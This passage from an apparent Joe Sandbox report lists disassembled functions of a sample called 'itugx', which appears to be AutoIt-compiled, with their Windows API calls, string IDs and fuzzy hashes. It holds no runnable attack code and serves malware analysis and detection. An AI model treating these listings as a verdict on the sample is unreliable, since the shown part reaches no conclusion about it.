                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                    • String ID: 0$2
                                                    • API String ID: 93392585-3793063076
                                                    • Opcode ID: a0bfca12ea3b934f064b57ae39d27848da75c0cd6e7686b4311169e93068e084
                                                    • Instruction ID: 4952ce2dafccf889833dd886ab407f78b1be5bc65aee3a6a9a0fd7a2b67af132
                                                    • Opcode Fuzzy Hash: a0bfca12ea3b934f064b57ae39d27848da75c0cd6e7686b4311169e93068e084
                                                    • Instruction Fuzzy Hash: D951B570910305ABDF32CF68C9C4BAEBBF9AF45314F18A11DE419AB291D7789D40CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037D034 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 0037D0D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    • Opcode ID: 6702a4ceaa25a2b988edd4e2f5428711c6fc329c03030d5f9e98dc28a8b5f8e6
                                                    • Instruction ID: ec6519de15ffbabc565164c3cbdb3c9b83d180f780090d87ef392e03089a9108
                                                    • Opcode Fuzzy Hash: 6702a4ceaa25a2b988edd4e2f5428711c6fc329c03030d5f9e98dc28a8b5f8e6
                                                    • Instruction Fuzzy Hash: 03110D3224C306FAE7375B249CC2CEA67FC9F15320F61402BF9087A682EB79AD014164
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037E653 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 642191829-3771769585
                                                    • Opcode ID: 18cd321770d0cbf6c66b7c86b7b7fcb7cf217da1e3f6ff62c023473f0bf7c24f
                                                    • Instruction ID: 0efb9f8bff37a2f883f2d64598b40fdb1d685e7762b2089f8e586c2af088b133
                                                    • Opcode Fuzzy Hash: 18cd321770d0cbf6c66b7c86b7b7fcb7cf217da1e3f6ff62c023473f0bf7c24f
                                                    • Instruction Fuzzy Hash: 7C112631900215AFDB3B6B30DC8AEDE77BCEF45710F1141A5F54A9A092EF789A81DA60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00394E80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit
                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 2610073882-625585964
                                                    • Opcode ID: 77f80a952c8ccdc2890cdcfa4d5154d152bd66ada94daba1887ca5f59621b46d
                                                    • Instruction ID: 9051455a5515e99732cc96680bc3201c21a78686fbb32357007045d8b2be37ed
                                                    • Opcode Fuzzy Hash: 77f80a952c8ccdc2890cdcfa4d5154d152bd66ada94daba1887ca5f59621b46d
                                                    • Instruction Fuzzy Hash: C4919071A00619AFDF26CFA5C884FAEBBB8EF45714F108559F506AB240D7709985CFA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003942A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 003942C8
                                                    • CharUpperBuffW.USER32(?,?), ref: 003943D7
                                                    • _wcslen.LIBCMT ref: 003943E7
                                                    • VariantClear.OLEAUT32(?), ref: 0039457C
                                                      • Part of subcall function 003815B3: VariantInit.OLEAUT32(00000000), ref: 003815F3
                                                      • Part of subcall function 003815B3: VariantCopy.OLEAUT32(?,?), ref: 003815FC
                                                      • Part of subcall function 003815B3: VariantClear.OLEAUT32(?), ref: 00381608
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                    • API String ID: 4137639002-1221869570
                                                    • Opcode ID: 0151fe0fbfb7eaae7b036e976191c921a27d6354e03be6c326e9d8573f2dbf9c
                                                    • Instruction ID: 7f9323cd695ddbc820f07bbd514a7760b07ee240180b7b1e1876c178bd04ebb8
                                                    • Opcode Fuzzy Hash: 0151fe0fbfb7eaae7b036e976191c921a27d6354e03be6c326e9d8573f2dbf9c
                                                    • Instruction Fuzzy Hash: 86918C756083019FCB05EF68C48196AB7E9FF89314F14892DF88A9B351DB30ED46CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A2A5C Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenu.USER32(?), ref: 003A2AE2
                                                    • GetMenuItemCount.USER32 ref: 003A2B14
                                                    • GetMenuStringW.USER32 ref: 003A2B3C
                                                    • _wcslen.LIBCMT ref: 003A2B72
                                                    • GetMenuItemID.USER32(?,?), ref: 003A2BAC
                                                    • GetSubMenu.USER32 ref: 003A2BBA
                                                      • Part of subcall function 003742CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 003742E6
                                                      • Part of subcall function 003742CC: GetCurrentThreadId.KERNEL32 ref: 003742ED
                                                      • Part of subcall function 003742CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00372E43), ref: 003742F4
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003A2C42
                                                      • Part of subcall function 0037F1A7: Sleep.KERNEL32 ref: 0037F21F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                    • String ID:
                                                    • API String ID: 4196846111-0
                                                    • Opcode ID: 4f99f90f34ba038c481ac746c7140fb27c7a53e2e99c91c1e81989e21eadef63
                                                    • Instruction ID: 891e73f35c17ab6e266d7e311133efd135963aa0c107265d533aa37a37009b50
                                                    • Opcode Fuzzy Hash: 4f99f90f34ba038c481ac746c7140fb27c7a53e2e99c91c1e81989e21eadef63
                                                    • Instruction Fuzzy Hash: 6271A475A00205AFCB16DF68C885AAEB7F5FF49320F158459E816EB351DB34ED41CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A87FD Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindow.USER32(00000000), ref: 003A8896
                                                    • IsWindowEnabled.USER32(00000000), ref: 003A88A2
                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 003A897D
                                                    • SendMessageW.USER32(00000000,000000B0,?,?), ref: 003A89B0
                                                    • IsDlgButtonChecked.USER32(?,00000000), ref: 003A89E8
                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 003A8A0A
                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003A8A22
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                    • String ID:
                                                    • API String ID: 4072528602-0
                                                    • Opcode ID: 78808731554b34e5d89362232ed3f5c0d4a0a8de471e0aa07ff27b069e292ffd
                                                    • Instruction ID: c5e626604a1990e5be3e7b60207eef5280795ab361769a7cbfbc27112675d242
                                                    • Opcode Fuzzy Hash: 78808731554b34e5d89362232ed3f5c0d4a0a8de471e0aa07ff27b069e292ffd
                                                    • Instruction Fuzzy Hash: 1B71AA34A04244AFEF2B9F54C894FBABBB9EF1B300F154459F896972A1CF35A950CB11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037808C Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003780D1
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003780F7
                                                    • SysAllocString.OLEAUT32(00000000), ref: 003780FA
                                                    • SysAllocString.OLEAUT32 ref: 0037811B
                                                    • SysFreeString.OLEAUT32 ref: 00378124
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0037813E
                                                    • SysAllocString.OLEAUT32(?), ref: 0037814C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 4d928494438289afc62f760254a8ccb48669b6b353efb05a93a5160230ff384b
                                                    • Instruction ID: e4c5bfd6bd020921d4f5e7df2eb41f05f014d784d790e4cb0d9ce5c50e85b9db
                                                    • Opcode Fuzzy Hash: 4d928494438289afc62f760254a8ccb48669b6b353efb05a93a5160230ff384b
                                                    • Instruction Fuzzy Hash: 22218675600204BFDB219FA9DC88CAA77ECEB49360B51C125F909CB2A0DA78EC45CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00380D8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetStdHandle.KERNEL32(0000000C), ref: 00380DAE
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00380DEA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CreateHandlePipe
                                                    • String ID: nul
                                                    • API String ID: 1424370930-2873401336
                                                    • Opcode ID: 70805679175ef4eca232c93f67bbe4f6f14c72a75c9172642d4c3b045c761d4e
                                                    • Instruction ID: 9ebb6b3b6ddd4f591d5d77e87e4615e550319d97244067fe5d8e2eee3fe8bca4
                                                    • Opcode Fuzzy Hash: 70805679175ef4eca232c93f67bbe4f6f14c72a75c9172642d4c3b045c761d4e
                                                    • Instruction Fuzzy Hash: 7C218D70500305EFDB66AF69DC04B9ABBA8FF41720F204E59F9A1D72E0D770A848CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00380E63 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00380E82
                                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00380EBD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CreateHandlePipe
                                                    • String ID: nul
                                                    • API String ID: 1424370930-2873401336
                                                    • Opcode ID: c97f01890a1cac193334fed3853d376b2c68272988984477d7d01ea5a04fdebc
                                                    • Instruction ID: dd819eb5ba2dfb1ca86222cefddfdad22ef01e4a943f5350a5fd3dab7dd3ebe8
                                                    • Opcode Fuzzy Hash: c97f01890a1cac193334fed3853d376b2c68272988984477d7d01ea5a04fdebc
                                                    • Instruction Fuzzy Hash: 6B219071500305ABDB76AF38DC04A9AB7E8EF55724F204B59FEA1E72E0D7709848CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003A4A0C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0031771B: CreateWindowExW.USER32 ref: 00317759
                                                      • Part of subcall function 0031771B: GetStockObject.GDI32(00000011), ref: 0031776D
                                                      • Part of subcall function 0031771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00317777
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003A4A71
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003A4A7E
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003A4A89
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003A4A98
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003A4AA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: efeb2c66b7075bc57ea89602048da6f2874b4b6b4c0421ae2694316bb87e3a26
                                                    • Instruction ID: 4bbf1eea12ca26172869154053a6cd9292099bc01c320ec2df53042a3a7115bf
                                                    • Opcode Fuzzy Hash: efeb2c66b7075bc57ea89602048da6f2874b4b6b4c0421ae2694316bb87e3a26
                                                    • Instruction Fuzzy Hash: FA11C4B215021DBEEF129F64CC81EE77FADEF09758F018111FB18A6090CA729C21DBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037E223 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0037E23D
                                                    • LoadStringW.USER32(00000000), ref: 0037E244
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0037E25A
                                                    • LoadStringW.USER32(00000000), ref: 0037E261
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0037E2A5
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 0037E282
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 4072794657-3128320259
                                                    • Opcode ID: 6310e384de899ab89e208a4f6e1d6aad116b3a1e7ce4428720163a5d8ffba508
                                                    • Instruction ID: 460561f3363ecf392f58656a8d00fa918825ed76c39837a859bf9c2bb7eceb59
                                                    • Opcode Fuzzy Hash: 6310e384de899ab89e208a4f6e1d6aad116b3a1e7ce4428720163a5d8ffba508
                                                    • Instruction Fuzzy Hash: 040181F6900208BFE752ABA4DD89EEB776CDB08300F408591F74AE6451EA749E848B70
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003925BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0039271D
                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0039273E
                                                    • WSAGetLastError.WSOCK32 ref: 0039274F
                                                    • htons.WSOCK32(?,?,?,?,?), ref: 00392838
                                                    • inet_ntoa.WSOCK32(?), ref: 003927E9
                                                      • Part of subcall function 00374277: _strlen.LIBCMT ref: 00374281
                                                      • Part of subcall function 00393B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0038F569), ref: 00393B9D
                                                    • _strlen.LIBCMT ref: 00392892
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                    • String ID:
                                                    • API String ID: 3203458085-0
                                                    • Opcode ID: 6efeaaa72bf42ad1f60217e1b4a027d4e353085f8f9a5e093319e702cf136c74
                                                    • Instruction ID: cfd5b97530226410515f2017c7d12f90d995e9418c7ae4901e74618b3d5c1ff9
                                                    • Opcode Fuzzy Hash: 6efeaaa72bf42ad1f60217e1b4a027d4e353085f8f9a5e093319e702cf136c74
                                                    • Instruction Fuzzy Hash: 52B10235204700AFC726DF24C895E6B7BE9AF88318F55854CF4965F2A2CB31ED82CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00340547 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __allrem.LIBCMT ref: 0034044A
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00340466
                                                    • __allrem.LIBCMT ref: 0034047D
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0034049B
                                                    • __allrem.LIBCMT ref: 003404B2
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003404D0
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                    • String ID:
                                                    • API String ID: 1992179935-0
                                                    • Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                    • Instruction ID: 91f190a0612299dde40e344fd4c95cc7a9b149628b926c3a53b93bc40a2be026
                                                    • Opcode Fuzzy Hash: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                    • Instruction Fuzzy Hash: 2B81E8767007059BD72AAE79CC81B6BB7E8AF41324F25452AF711DE791E770F9008B50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0034658E Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00338669,00338669,?,?,?,003467DF,00000001,00000001,8BE85006), ref: 003465E8
                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,003467DF,00000001,00000001,8BE85006,?,?,?), ref: 0034666E
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00346768
                                                    • __freea.LIBCMT ref: 00346775
                                                      • Part of subcall function 00343BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00336A99,?,0000015D,?,?,?,?,003385D0,000000FF,00000000,?,?), ref: 00343BE2
                                                    • __freea.LIBCMT ref: 0034677E
                                                    • __freea.LIBCMT ref: 003467A3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                    • String ID:
